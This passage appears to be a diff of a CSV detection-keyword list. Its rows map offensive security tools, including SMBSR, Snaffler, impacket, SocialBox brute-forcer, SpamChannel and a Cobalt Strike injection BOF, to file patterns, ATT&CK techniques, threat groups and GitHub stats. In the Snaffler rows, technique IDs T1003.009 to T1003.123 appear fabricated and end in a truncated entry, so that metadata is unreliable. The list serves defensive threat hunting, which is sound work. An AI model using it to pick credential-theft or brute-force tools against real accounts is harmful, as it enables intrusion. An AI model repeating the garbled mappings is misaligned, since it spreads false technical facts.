"*/SMBSR.git*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smbsr.log*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" @@ -5360,13 +5417,13 @@ "*/smtp-vuln-cve2011-1720.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2011-1764.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2020-28017-through-28026-21nails.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" -"*/smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","1","N/A","9","3","228","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" -"*/SnaffCon.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*/SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*/SnaffCore/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*/snafflertest/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","1","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*/SnaffCon.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/SnaffCore/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/snafflertest/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" "*/SnaffPoint.git*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" -"*/sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/sniffer.git*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" "*/sniffer-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -5383,29 +5440,31 @@ "*/snmp-win32-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmpwn.git*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*/snmpwn.rb*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" -"*/SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" -"*/SocialBox-Termux*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","10","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*/SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*/SocialBox-Termux*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","10","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" "*/SocialPwned*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" "*/socks-auth-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/socks-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/socks-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SpaceRunner.git*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" -"*/SpamChannel.git*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","256","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" -"*/spawn.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"*/SpamChannel.git*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & 